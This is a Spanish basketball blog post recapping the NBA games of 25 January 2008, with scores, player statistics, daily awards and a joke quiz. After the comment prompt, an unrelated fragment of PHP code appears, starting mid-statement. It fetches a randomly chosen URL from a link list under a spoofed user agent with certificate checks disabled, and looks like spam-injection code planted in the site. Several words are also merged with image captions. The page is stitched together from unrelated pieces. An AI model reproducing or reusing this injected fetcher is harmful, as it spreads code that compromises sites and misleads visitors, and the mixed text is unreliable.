La crónica (25/01/08)

26 de January de 2008 por Viva_Dirk

La noche del viernes nos dejó 12+1 partidos y muy variados, desde los 75 puntos de los Bucks hasta los 127 de Utah. Veamos, antes de meternos en harina, el resumen en imágenes de estos partidos:

La jornada comenzaba con un duelo por todo lo alto en el Este. Detroit ganó a Orlando en el primer cuarto con un parcial de 18-39 que los Magics no podrian remontar el todo el encuentro que tuvo a Hamilton como estrella con 32-8-8. Los Grizzlies, que tuvieron la baja de Pau Gasol, perdieron ante los Wizars en un mal partido de Navarro desde la titularidad. En los capitalinos todo el quinteto anotó 12 puntos o mas, con Jamison en 24-12-5. Los Suns remontaron los 13 Sunspuntos que tenían en contra al descanso pese a otra tremenda actuación de King James. Phoenix acabó con un 17 de 33 en triples, con mención especial para Raja Bell que convirtió 6 de 10 intentos para un 27-4-4, acompañado de Nash, Amare y canasta para ponerse 2 arriba de Marion. Por los Cavs funcionó Larry Hughes como hacia mucho que no se le veia. Con él a ese nivel están para pelear con cualquiera. Los Raptors apalizaron por 31 a los Bucks, en los cuales nadie anotó mas de 12 puntos y entre todo el equipo sumaron 11 asistencias. Una menos que Calderón que volvió a reivindicarse con 11-12, 2 robos y una sola pérdida y fue el complemento perfecto para Bosh que acabó con 32-7-3. Boston sufrió lo indecible antes los Wolves. La diferencia que marcan sus records no se vio reflejada en ningun momento sobre el parquet. En Boston sus 2 exteriores estrella sumaron un espeluznante 8 de 33 en tiros y 11 pérdidas de balón, mientras Garnett solo intentó 5 tiros a canasta. El mejor fue Perkins con 22 puntos y 3 tapones. En Minny una buena actuación colectiva (13 robos de balón) les llevó a disputar el partido, pero un robo de balón por parte de Garnett a menos de 2 segundos para el final resultó definitivo. El duelo entre Sixers y Knicks lo ganaron estos últimos con Zach en 16-15.

Los Hornets no tuvieron problemas para ganar a los Clippers y desprenden una imagen de equipazo. Si Stojakovic vuelve por sus fueros, anoche el serbio anotó 26 puntos con 6 de 9 en triples, y el resto de sus compañeros sigue haciendo cada uno lo suyo serán un rival temible cuando lleguen los Play Offs. El partidazo de Bryant con 40-10-5 no fue suficiente para parar a los Mavs, que con sendos 26-10 de Howard&Nowitzki ganaron a unos Lakers que ya echan de menos a Bynum. Otros que echan de Stojakovicmenos a alguien son los Bulls, en este caso a Luol Deng, aunque también contaron con la baja de Gordon. Sin ellos perdieron frente a los Bobcats donde Okafor y Wallace camparon a sus anchas. Kings y Jazz nos brindaron un partido de 240 puntos, en el cual la dirección de juego de Williams, la solvencia de Boozer y Kirilenko haciendo de todo, fueron demasiado para los de Sacramento. Los Nets siguen con su racha de derrotas, esta vez frente a Denver que no pudo contar con Carmelo Anthony, pero que para acompañar a Iverson contó con grandes actuaciones de Kleiza (16-7 en los últimos 10 partidos) y Martin. Houston venció a Portland en un partido de marcador bajo. Scola fue el mas destacado con 11-12, y la clave del partido estuvo en los 48 rebotes atrapados por Houston, 18 mas que los de Portland. En el último partido de la noche los Hawks se impusieron a los Sonics con una gran actuación de Marvin Williams y el ya habitual doble-doble de Horford, en esta ocasión 10-16.

Resultados:

Bucks 75 – 106 Raptors

Grizzlies 93 – 104 Wizards

Suns 110 – 108 Cavaliers

Magic 93 – 101 Pistons

Timberwolves 86 – 87 Celtics

76ers 81 – 89 Knicks

Clippers 92 – 111 Hornets

Bobcats 90 – 77 Bulls

Lakers 105 – 112 Mavericks

Nets 85 – 100 Nuggets

Kings 113 – 127 Jazz

Rockets 89 – 79 Trail Blazers

Hawks 99 – 90 Supersonics

Vamos con nuestros premios de la jornada:

MVP: Con tantos partidos, hay muchos candidatos para todos los premios. Pese a las derrotas de sus equipos, no podemos dejar pasar las grandes actuaciones de algunos de titulares en el próximo All-Star, Lebron con 36-7-5, Kobe 40-10-5 o el triple doble Nº98 de la carrera de Jason Kidd. Hamilton al borde del triple doble con 32-8-8 y Jamison liderando a los Wizars con 24-12-5 nos lo han puesto dificil, pero nuestro MVP va a parar a Carlos Boozer, que apabulló a los Kings desde la pintura con 33 puntos y 10 rebotes, con un mastodontico 15 de 19 en tiros.

Rookie: Al Horford es una vez mas el mejor rookie de la noche y quien sabe si de la temporada. Ayer ayudó a los Hawks en su victoria frente a los Sonics de Kevin Durant, con 10 puntos y 16 rebotes. Luis Scola con 11 puntos y 12 rebotes también merece una mención especial.

Sorpresa: Raja Bell con 27 puntos fue el máximo anotador y pieza clave de Phoenix para ganar a los Cavs, es escolta sumó además 4 rebotes y 4 asistencias, con una excelente serie de tiro. Kyle Lowry con 13 puntos y 10 asistencias dejó claro que merece un hueco en la rotación de Memphis.

Decepción: Aquí no ha tenido competidores Lamar Odom, que en 31 minutos anotó 4 puntos, con un 2 de 9 en tiros. Si este partido es decepcionante de por si, más aun ahora que con la ausencia de Bynum, el 2º jugador que mas cobra en la franquicia del purple&gold tiene que dar un paso al frente.

Pasatiempos

¿De que hablan estos 3?

Blazers

 a) De las cheerleaders.

b) De que Yao es demasiado alto, un abusón.

c) Que tienen ganas de jugar con Oden.

d) No hablan, solo tosen.

Respuesta correcta: La C, aunque no descartamos la A.

Para que entienda la conversación, al ganador se le enviará un video (aunque sobría con un disquet) con todos los movimientos al poste de Joel Przybilla.

Acabamos con las 10 mejores jugadas de anoche:

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>